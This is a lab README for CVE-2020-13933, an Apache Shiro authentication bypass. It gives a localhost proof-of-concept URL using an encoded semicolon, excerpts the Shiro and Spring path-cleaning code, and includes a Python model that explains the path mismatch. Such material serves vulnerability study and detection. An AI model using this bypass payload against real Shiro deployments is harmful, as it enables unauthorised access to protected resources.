
CVE-2020-13933 PoC — Apache Shiro authorization issue vulnerability

Source
Associated Vulnerability
Title: Apache Shiro authorization issue vulnerability (CVE-2020-13933)
Description: Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass.
Description
CVE-2020-13933 lab: Shiro authentication bypass vulnerability
Readme
# CVE-2020-13933 lab

> Authentication bypass in Shiro < 1.6.0

------

## PoC

[http://127.0.0.1:8080/res/%3bpoc](http://127.0.0.1:8080/res/%3bpoc)


## Lab environment

![](https://img.shields.io/badge/JDK-1.8-brightgreen.svg) ![](https://img.shields.io/badge/Spring-2.3.3-brightgreen.svg) ![](https://img.shields.io/badge/Shiro-1.5.3-brightgreen.svg)


## Code overview

- [`ShiroConfig.java`](/src/main/java/com/exp/cve/ShiroConfig.java): permission configuration; a request for a `/res/*` resource is 302-redirected to the login page for authentication
- [`NameController.java`](/src/main/java/com/exp/cve/NameController.java):
    - `/res/{name}`: requests the resource named `name` (triggers authentication)
    - `/res/`: requests no resource (does not trigger authentication)


## Lab verification

When no resource name is given in the request path, authentication is not triggered and no resource is returned: [`http://127.0.0.1:8080/res/`](http://127.0.0.1:8080/res/)

![](/imgs/01.png)

When a resource name is given in the request path, the request is 302-redirected to the login page: [`http://127.0.0.1:8080/res/poc`](http://127.0.0.1:8080/res/poc)

![](/imgs/02.png)

When the resource is requested with the specially constructed PoC path, authentication is not triggered and the resource is returned: [http://127.0.0.1:8080/res/%3bpoc](http://127.0.0.1:8080/res/%3bpoc) (`%3b` is the URL encoding of `;`)

![](/imgs/03.png)


## Vulnerability DEBUG locations

### shiro-web-1.5.3.jar

```java
// org.apache.shiro.web.util.WebUtils.java
// line 111

public static String getPathWithinApplication(HttpServletRequest request) {
    return normalize(removeSemicolon(getServletPath(request) + getPathInfo(request)));
}
```

### spring-web-5.2.5.RELEASE.jar

```java
// org.springframework.web.util.UrlPathHelper.java
// line 459

private String decodeAndCleanUriString(HttpServletRequest request, String uri) {
    uri = removeSemicolonContent(uri);
    uri = decodeRequestString(request, uri);
    uri = getSanitizedPath(uri);
    return uri;
}
```
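To make the two excerpts above concrete, the Python model below (an added example, not code from this repository) re-implements both path-cleaning routines as the excerpts describe them and flags any request on which Shiro's view of the path and Spring's view disagree. It assumes the filter chain and controller routes described in the README for `ShiroConfig` and `NameController`, and models the servlet container's decoding of servletPath + pathInfo with `urllib.parse.unquote`; `normalize()` and `getSanitizedPath()` are left out because they do not affect the `;` handling.

```python
from urllib.parse import unquote

def shiro_1_5_3_path(request_uri: str) -> str:
    """Model of WebUtils.getPathWithinApplication() in shiro-web 1.5.3 (excerpt above).
    The container has already percent-decoded servletPath + pathInfo, so an encoded
    %3b is a literal ';' by the time removeSemicolon() truncates at the FIRST ';'.
    normalize() is omitted: it only matters for '.', '..' and repeated slashes."""
    decoded = unquote(request_uri)
    idx = decoded.find(";")
    return decoded if idx == -1 else decoded[:idx]

def spring_5_2_5_path(request_uri: str) -> str:
    """Model of UrlPathHelper.decodeAndCleanUriString() in spring-web 5.2.5 (excerpt above).
    removeSemicolonContent() runs on the still-encoded URI and strips ';...' within each
    segment; decoding happens afterwards, so %3b survives as a literal ';' in the name.
    getSanitizedPath() (collapsing '//') is omitted for the same reason."""
    cleaned = "/".join(seg.split(";", 1)[0] for seg in request_uri.split("/"))
    return unquote(cleaned)

def lab_requires_authc(shiro_path: str) -> bool:
    """Assumed filter chain from the README: '/res/*' -> authc, '/res/' unfiltered.
    Ant-style '/res/*' needs at least one character after '/res/'."""
    return shiro_path.startswith("/res/") and len(shiro_path) > len("/res/")

def lab_serves_resource(spring_path: str) -> bool:
    """Assumed routing from the README: '/res/{name}' returns a resource, '/res/' none."""
    return spring_path.startswith("/res/") and len(spring_path) > len("/res/")

def analyse(request_uri: str) -> dict:
    """Differential check: Spring routes the request to a resource while Shiro matched
    it against a path that carries no authc filter -> authentication bypass."""
    shiro_view = shiro_1_5_3_path(request_uri)
    spring_view = spring_5_2_5_path(request_uri)
    return {
        "uri": request_uri,
        "shiro_path": shiro_view,
        "spring_path": spring_view,
        "bypass": lab_serves_resource(spring_view) and not lab_requires_authc(shiro_view),
    }

# Constructed sample URIs (not captured traffic): the README's PoC plus three controls.
SAMPLE_URIS = ["/res/", "/res/poc", "/res/poc;v=1", "/res/%3bpoc"]

if __name__ == "__main__":
    for uri in SAMPLE_URIS:
        r = analyse(uri)
        print(f"{uri:14} shiro={r['shiro_path']:10} spring={r['spring_path']:10} bypass={r['bypass']}")
```

Only the `%3b` request is flagged: a literal `;` is stripped by both routines and the two views agree, which is why the encoded form is what the PoC relies on and what a log review should look for.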

